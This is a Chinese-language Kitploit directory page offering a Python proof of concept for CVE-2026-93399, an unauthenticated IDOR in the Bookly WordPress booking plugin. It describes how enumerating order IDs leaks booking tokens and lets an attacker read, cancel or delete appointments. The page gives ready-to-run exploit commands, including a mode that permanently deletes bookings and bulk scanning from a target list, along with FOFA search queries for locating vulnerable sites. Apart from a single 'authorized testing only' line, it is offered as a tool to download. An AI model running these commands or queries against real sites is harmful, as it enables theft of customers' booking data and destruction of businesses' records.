Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-93399 — Python PoC,用于 CVE-2026-93399,这是 Bookly <= 28.2 中的一个未认证 IDOR,会泄露订单令牌、暴露预约并回滚预订。 | Kitploit
工具/GitHubGitHub/murrez/cve-2026-93399
侦察漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试
GitHubmurrez/cve-2026-93399

CVE-2026-93399

Python PoC,用于 CVE-2026-93399,这是 Bookly <= 28.2 中的一个未认证 IDOR,会泄露订单令牌、暴露预约并回滚预订。

查看仓库
49小时15分前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-93399 — Bookly IDOR(订单令牌泄露与预约回滚)

针对 Bookly(bookly-responsive-appointment-booking-tool)中 CVE-2026-93399 的 Python 3 PoC。

描述(PoCbit / GitHub)

CVE-2026-93399 — Bookly ≤ 28.2 在公开预约 AJAX 接口中存在不安全的直接对象引用(CWE-639):bookly_get_form_id 会将攻击者可控的 order_id 存入表单会话,而 bookly_render_complete 会在未验证该会话是否创建了该订单的情况下,返回该订单的密钥 bookly_order 令牌。未认证攻击者可枚举订单 ID、窃取令牌、通过 bookly_add_to_calendar 拉取预约数据,并使用 bookly_rollback_order 取消/删除未完成的预约。CVSS 3.1:9.1 严重(C:N/I:H/A:H)。已在 > 28.2 中修复。

PoC 页面: https://pocbit.org/pocs/cve-2026-93399

PoCbit

目录索引:https://pocbit.org/pocs/

用法

root@kitploit:~
pip install -r requirements.txt

python poc.py -u https://site.example --mode check
python poc.py -u https://site.example --mode check --order-id 15
python poc.py -u https://site.example --mode check --order-start 1 --order-end 30

python poc.py -u https://site.example --mode exploit --order-id 15 --calendar
python poc.py -u https://site.example --mode exploit --order-id 15 --rollback --confirm-delete
python poc.py --list targets.example.txt --mode check -j 10 --order-start 1 --order-end 5

FOFA

root@kitploit:~
body="/wp-content/plugins/bookly-responsive-appointment-booking-tool/"
body="bookly_get_form_id"

法律声明

仅限授权测试。--rollback --confirm-delete 会永久删除预约。

下载工具